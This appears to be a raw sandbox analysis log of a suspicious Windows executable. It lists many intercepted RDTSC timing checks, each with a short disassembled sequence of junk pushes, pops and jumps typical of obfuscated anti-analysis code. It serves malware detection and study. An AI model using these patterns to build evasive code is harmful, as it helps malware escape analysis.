Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCCA09 second address: DCCA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCCA0E second address: DCCA13 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD123F second address: DD1243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD1243 second address: DD1276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B474h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FB77110B46Eh 0x00000011 jp 00007FB77110B466h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007FB77110B468h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D97E5B second address: D97E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D97F84 second address: D97F8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D97F8A second address: D97F94 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB770CC130Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D980A9 second address: D980C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B470h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D980C7 second address: D980ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FB770CC1312h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FB770CC1306h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D980ED second address: D980FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B46Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98288 second address: D982A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB770CC1316h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D983B9 second address: D983E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B478h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FB77110B46Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D983E7 second address: D983EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98687 second address: D98697 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB77110B466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98E08 second address: D98E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98E0D second address: D98E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB77110B478h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007FB77110B475h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jp 00007FB77110B482h 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98ED2 second address: D98ED7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98ED7 second address: D98F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FB77110B468h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+124896DBh] 0x0000002a call 00007FB77110B472h 0x0000002f mov dword ptr [ebp+122D306Fh], edi 0x00000035 pop edi 0x00000036 nop 0x00000037 jl 00007FB77110B46Eh 0x0000003d jl 00007FB77110B468h 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FB77110B46Ch 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98F3E second address: D98F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a je 00007FB770CC130Ch 0x00000010 mov edx, dword ptr [ebp+122D2D68h] 0x00000016 lea eax, dword ptr [ebp+12489697h] 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FB770CC1308h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 xor dword ptr [ebp+122D17F1h], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jno 00007FB770CC1308h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD1553 second address: DD155C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD155C second address: DD1560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD1560 second address: DD157C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B470h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FB77110B472h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD16A9 second address: DD16AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD16AF second address: DD16B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD16B4 second address: DD16BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD1824 second address: DD182A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD182A second address: DD1859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FB770CC130Ch 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB770CC1318h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD1859 second address: DD1868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FB77110B466h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD824D second address: DD8251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8251 second address: DD825B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD825B second address: DD8265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB770CC1306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD83CF second address: DD83D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD86EC second address: DD86F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD86F0 second address: DD86F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8B55 second address: DD8B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB770CC1306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8B5F second address: DD8B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB77110B471h 0x00000010 push ebx 0x00000011 jnl 00007FB77110B466h 0x00000017 jns 00007FB77110B466h 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8CCD second address: DD8CE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8CE1 second address: DD8CFF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB77110B473h 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8CFF second address: DD8D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8E43 second address: DD8E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007FB77110B470h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8E5F second address: DD8E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8E64 second address: DD8E8A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB77110B46Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007FB77110B473h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8E8A second address: DD8E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8E90 second address: DD8E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8E94 second address: DD8E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE0087 second address: DE008B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDFDEF second address: DDFDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDFDF7 second address: DDFE30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FB77110B477h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FB77110B468h 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FB77110B46Eh 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE3162 second address: DE3166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE2A67 second address: DE2A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB77110B466h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE2BD4 second address: DE2BE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE2BE9 second address: DE2C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FB77110B466h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FB77110B47Ah 0x00000018 pushad 0x00000019 jg 00007FB77110B466h 0x0000001f push edi 0x00000020 pop edi 0x00000021 jl 00007FB77110B466h 0x00000027 push esi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE2C27 second address: DE2C3B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB770CC1308h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB770CC1306h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE2D8A second address: DE2D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE2D91 second address: DE2DB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB770CC1319h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9D62 second address: DE9D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9D66 second address: DE9D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9D6A second address: DE9D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB77110B475h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9D88 second address: DE9D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9D91 second address: DE9D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D988A3 second address: D988C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FB770CC130Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jl 00007FB770CC130Eh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D988C1 second address: D98909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push esi 0x00000009 call 00007FB77110B468h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], esi 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc esi 0x0000001c push esi 0x0000001d ret 0x0000001e pop esi 0x0000001f ret 0x00000020 push 00000004h 0x00000022 mov dword ptr [ebp+122D249Eh], edx 0x00000028 push eax 0x00000029 jo 00007FB77110B47Ah 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FB77110B46Ch 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9051 second address: DE9086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB770CC1312h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9086 second address: DE908B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9AB8 second address: DE9ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9ABC second address: DE9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9AC2 second address: DE9ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB770CC1317h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE9ADD second address: DE9AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEDF19 second address: DEDF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE0E4 second address: DEE105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B46Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB77110B46Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE105 second address: DEE13D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1317h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FB770CC130Eh 0x00000014 push ebx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jc 00007FB770CC1306h 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE13D second address: DEE144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE144 second address: DEE160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB770CC1306h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB770CC130Dh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE160 second address: DEE164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1D7C second address: DF1D88 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB770CC130Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1753 second address: DF1758 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1758 second address: DF1763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1763 second address: DF1767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1767 second address: DF176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1A3D second address: DF1A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB77110B466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1A47 second address: DF1A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1A4D second address: DF1A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB77110B474h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007FB77110B47Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnl 00007FB77110B466h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1A79 second address: DF1A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF9B78 second address: DF9B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 je 00007FB77110B466h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB77110B470h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF9B97 second address: DF9BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF9E7D second address: DF9E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF9E81 second address: DF9E99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF9E99 second address: DF9EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF9EAA second address: DF9ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB770CC1319h 0x00000009 jmp 00007FB770CC1311h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF9ED9 second address: DF9F00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FB77110B466h 0x00000009 jmp 00007FB77110B479h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF9F00 second address: DF9F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA215 second address: DFA219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA219 second address: DFA243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FB770CC1322h 0x0000000e jmp 00007FB770CC1310h 0x00000013 jmp 00007FB770CC130Ch 0x00000018 rdtsc
